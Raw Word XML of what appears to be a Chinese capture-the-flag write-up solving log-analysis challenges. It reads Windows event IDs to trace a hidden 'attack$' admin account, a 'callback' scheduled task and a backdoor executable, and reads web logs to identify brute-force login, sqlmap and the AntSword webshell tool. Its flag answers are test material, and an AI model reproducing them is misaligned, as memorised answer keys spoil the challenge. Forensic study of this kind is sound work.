          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.222.200</w:t>
      </w:r>
      <w:r w:rsidR="00A75ECE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00F75FDF" w:rsidRPr="00F75FDF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RDP的账</w:t>
      </w:r>
      <w:r w:rsidR="00F75FDF" w:rsidRPr="00F75FDF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r w:rsidR="00A5485B" w:rsidRPr="00A5485B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ADOFLMB\attack$</w:t>
      </w:r>
      <w:r w:rsidR="007C7982">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，前面是域名，后面是用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA935A2" w14:textId="77777777" w:rsidR="00FD1B81" w:rsidRDefault="00FD1B81" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="706AA440" w14:textId="2F4A0313" w:rsidR="00FD1B81" w:rsidRPr="0062767C" w:rsidRDefault="00FD1B81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用户的事件I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是</w:t>
      </w:r>
      <w:r w:rsidR="00732EC5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00732EC5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>720</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FA2006" w14:textId="500AFDB0" w:rsidR="00FD1B81" w:rsidRDefault="00473B8A" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00473B8A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50B31D75" wp14:editId="23561FF8">
            <wp:extent cx="5274310" cy="2221865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="346443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3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326A" w14:textId="106F4B0B" w:rsidR="009E0DB9" w:rsidRDefault="009E0DB9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建用户名</w:t>
      </w:r>
      <w:r w:rsidR="000E7A51" w:rsidRPr="000E7A51">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>attack$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ADB7EC" w14:textId="77777777" w:rsidR="00AA65A7" w:rsidRDefault="00AA65A7" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C33A6AF" w14:textId="6FCE8BD3" w:rsidR="00AA65A7" w:rsidRDefault="00AA65A7" w:rsidP="00723C4B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 w:rsidRPr="00AA65A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>添加到启用安全性的本地组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I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D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为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F420A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4732</w:t>
      </w:r>
      <w:r w:rsidR="00F420A9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（后来查了发现有多个组</w:t>
      </w:r>
      <w:r w:rsidR="00155BD2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属实运气到了</w:t>
      </w:r>
      <w:r w:rsidR="00FA640B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第一次就查到</w:t>
      </w:r>
      <w:r w:rsidR="00FA640B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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA640B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4732</w:t>
      </w:r>
      <w:r w:rsidR="00F420A9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）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A53A93" w14:textId="7A5D9C7F" w:rsidR="00BE6754" w:rsidRPr="00BE6754" w:rsidRDefault="00BE6754" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE6754">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7449A0EE" wp14:editId="4FFC100C">
            <wp:extent cx="5274310" cy="2228215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="2034897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7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C0CD" w14:textId="7133C5D3" w:rsidR="00DF59AE" w:rsidRDefault="00AC06F5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到组</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC06F5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CE5E0D" w14:textId="77777777" w:rsidR="007E4CB4" w:rsidRDefault="007E4CB4" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD716E9" w14:textId="704F9005" w:rsidR="007E4CB4" w:rsidRDefault="007E4CB4" w:rsidP="00723C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计划</w:t>
      </w:r>
      <w:r w:rsidR="00B65A50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00B65A50">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00F5748F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B65A50">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="008C6F2C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>698</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8D6482" w14:textId="56604A9F" w:rsidR="00E26FEE" w:rsidRDefault="00E26FEE" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26FEE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="471B9CB7" wp14:editId="7CCEBAFF">
            <wp:extent cx="5274310" cy="975995"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2041681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814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B4F" w14:textId="2D94E24E" w:rsidR="00C362D6" w:rsidRDefault="00C362D6" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C362D6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43BA889A" wp14:editId="6617539C">
            <wp:extent cx="4235668" cy="768389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="855059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59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1609" w14:textId="77777777" w:rsidR="00E54408" w:rsidRDefault="007319EF" w:rsidP="007319EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007319EF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>创建的计划名</w:t>
      </w:r>
      <w:r w:rsidR="00E54408">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>为callback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53082EBC" w14:textId="7E3E920F" w:rsidR="00AC06F5" w:rsidRDefault="007319EF" w:rsidP="007319EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007319EF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>后门所处的路径</w:t>
      </w:r>
      <w:r w:rsidR="00AD3C9B" w:rsidRPr="00AD3C9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>c:\windows\system32\windows_attack.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A963CBB" w14:textId="77777777" w:rsidR="00DD50CB" w:rsidRDefault="00DD50CB" w:rsidP="007319EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E77B08" w14:textId="0F42AE82" w:rsidR="00E20482" w:rsidRPr="007319EF" w:rsidRDefault="00E20482" w:rsidP="007319EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E20482">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SICTF{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E20482">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.222.200|attack$|Administrators|callback|c:\windows\system32\windows_attack.exe|ADOFLMB\attack$}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8CA1E1" w14:textId="77777777" w:rsidR="00AC06F5" w:rsidRPr="00723C4B" w:rsidRDefault="00AC06F5" w:rsidP="00723C4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F560196" w14:textId="77777777" w:rsidR="00E87691" w:rsidRDefault="00E87691" w:rsidP="00E87691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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
        </w:rPr>
        <w:t>日志分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144FC812" w14:textId="50EF47D5" w:rsidR="00E87691" w:rsidRDefault="00F50D4C" w:rsidP="008D66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给了三个日志</w:t>
      </w:r>
      <w:r w:rsidR="009348FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00D21A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>我觉得第一个是客户端请求日志，第二个是服务器响应日志</w:t>
      </w:r>
      <w:r w:rsidR="00B2589E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，第三个就是报错</w:t>
      </w:r>
      <w:r w:rsidR="007717A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
      <w:r w:rsidR="00396114">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="003309A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>题目</w:t>
      </w:r>
      <w:r w:rsidR="009348FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>要找</w:t>
      </w:r>
      <w:r w:rsidR="00D1283C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009348FE" w:rsidRPr="004F30D9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻击者的IP地址|攻击者得到Web应用后台管理权限的方法|攻击者在SQL注入攻击过程中使用的自动化工具名称|工具版本号|攻击者使用的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009348FE" w:rsidRPr="004F30D9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009348FE" w:rsidRPr="004F30D9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>连接工具（中文名）|工具版本号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43751DCB" w14:textId="17E1B616" w:rsidR="001740BE" w:rsidRDefault="001740BE" w:rsidP="008D66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个日志，清一色的</w:t>
      </w:r>
      <w:r w:rsidR="00EF72E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00EF72E7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0.11.35.95</w:t>
      </w:r>
      <w:r w:rsidR="004901FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，不填他都不行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0471EBC6" w14:textId="4A4707C3" w:rsidR="0052190F" w:rsidRDefault="0052190F" w:rsidP="008D6686">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0052190F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22019A02" wp14:editId="61270A0D">
            <wp:extent cx="990397" cy="2088515"/>
            <wp:effectExtent l="0" t="0" r="635" b="6985"/>
            <wp:docPr id="1898010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10867" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId30"/>
                    <a:srcRect t="32451"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="991051" cy="208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13CD2" w14:textId="7FBD4FFD" w:rsidR="00C64E5B" w:rsidRDefault="00C64E5B" w:rsidP="008D6686">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F30D9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻击者得到Web应用后台管理权限的方法</w:t>
      </w:r>
      <w:r w:rsidR="009E2A25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，在日志记录没多少就开始</w:t>
      </w:r>
      <w:r w:rsidR="00824D38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>一直</w:t>
      </w:r>
      <w:r w:rsidR="009E2A25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidR="0036049E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidR="00824D38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00DB6D05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>爆破方法没跑了</w:t>
      </w:r>
      <w:r w:rsidR="00CF16B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，提示说四个字</w:t>
      </w:r>
      <w:r w:rsidR="007951A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00CA7CCF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>答案</w:t>
      </w:r>
      <w:r w:rsidR="0082536B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="007951A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
      <w:r w:rsidR="0082536B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（错的话一直试就好了</w:t>
      </w:r>
      <w:r w:rsidR="00CF06AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="002A0B4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>doge</w:t>
      </w:r>
      <w:r w:rsidR="00CF06AC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="0082536B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EBE454" w14:textId="0F396EE2" w:rsidR="009E2A52" w:rsidRDefault="009E2A52" w:rsidP="008D6686">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E2A52">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="295F88C7" wp14:editId="5D6C006E">
            <wp:extent cx="5274310" cy="2404745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12730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0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E5D" w14:textId="7D71ADA6" w:rsidR="002F73BD" w:rsidRDefault="002F73BD" w:rsidP="008D66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面的就简单了</w:t>
      </w:r>
      <w:r w:rsidR="00644ED6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，下面清一色的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00644ED6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00644ED6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，后面就有它的版本号</w:t>
      </w:r>
      <w:r w:rsidR="00E851AA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E851AA" w:rsidRPr="00E851AA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D1FBC6F" wp14:editId="45377FA1">
            <wp:extent cx="5274310" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="39650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01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34CE" w14:textId="77777777" w:rsidR="0081184C" w:rsidRDefault="00017C98" w:rsidP="008D6686">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C98">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C98">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.2.4.18</w:t>
      </w:r>
      <w:r w:rsidR="0081184C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0D8D36" w14:textId="5B968A2F" w:rsidR="00017C98" w:rsidRDefault="0081184C" w:rsidP="008D668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webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>工具就是猜的，尝试几个主流的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F11BA" w:rsidRPr="004F30D9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F11BA" w:rsidRPr="004F30D9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>连接工具</w:t>
      </w:r>
      <w:r w:rsidR="0089029F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0089029F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>是蚁剑</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F94B68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F94B68" w:rsidRPr="00F94B68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DEB8AF0" wp14:editId="6E9DE362">
            <wp:extent cx="5274310" cy="3281680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="572766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6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6BA7" w14:textId="46B78668" w:rsidR="00372A5C" w:rsidRDefault="00372A5C" w:rsidP="008D668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蚁剑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.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A28AD0" w14:textId="5E3DC719" w:rsidR="006817F2" w:rsidRDefault="004653A7" w:rsidP="000A53AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SICTF</w:t>
      </w:r>
      <w:r w:rsidR="006817F2" w:rsidRPr="000A53AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidR="00AB7B5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00AB7B5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0.11.35.95</w:t>
      </w:r>
      <w:r w:rsidR="006817F2" w:rsidRPr="000A53AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="00C84F00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
      <w:r w:rsidR="006817F2" w:rsidRPr="000A53AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="00D72F6B" w:rsidRPr="00D72F6B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D72F6B" w:rsidRPr="00017C98">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidR="006817F2" w:rsidRPr="000A53AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="00D72F6B" w:rsidRPr="00017C98">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.2.4.18</w:t>
      </w:r>
      <w:r w:rsidR="006817F2" w:rsidRPr="000A53AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C3244B">
        <w:rPr>
